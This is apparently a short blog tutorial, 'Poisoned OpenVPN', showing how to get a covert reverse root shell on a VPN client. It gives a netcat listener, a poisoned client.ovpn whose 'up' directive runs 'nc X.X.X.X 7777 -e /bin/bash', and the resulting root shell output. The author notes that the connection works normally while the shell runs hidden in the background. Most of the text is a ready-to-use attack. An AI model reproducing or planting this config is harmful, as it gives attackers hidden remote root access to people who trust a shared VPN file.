This page looks best with JavaScript enabled

Poisoned OpenVPN

 ·  🎃 kr0m

In this occasion, we will learn how to get a shell on a remote computer acting as a VPN client, using the possibility of executing commands just after starting the VPN. Of course, the client must completely trust us or have somehow modified their VPN config. The best thing about this attack is that everything will seem to work normally while the connection is established in the background.

We put our netcat on listening mode to receive the reverse connection:

KettleBell ✺ ~> nc -l -p 7777

We configure the VPN file to execute a script when starting:

vi client.ovpn

script-security 2
up "/usr/bin/nc X.X.X.X 7777 -e /bin/bash"

The victim starts the VPN:

DirtyCow ~ # openvpn –config client.ovpn

In the netcat terminal, we get a nice shell:

KettleBell ✺ ~> nc -l -p 7777
id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),26(tape),27(video)
uname -a
Linux DirtyCow 4.9.95-gentoo-kr0m-ipv6-YAMA #1 SMP PREEMPT Wed Apr 25 10:22:48 CEST 2018 x86_64 Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz GenuineIntel GNU/Linux
If you liked the article, you can treat me to a RedBull here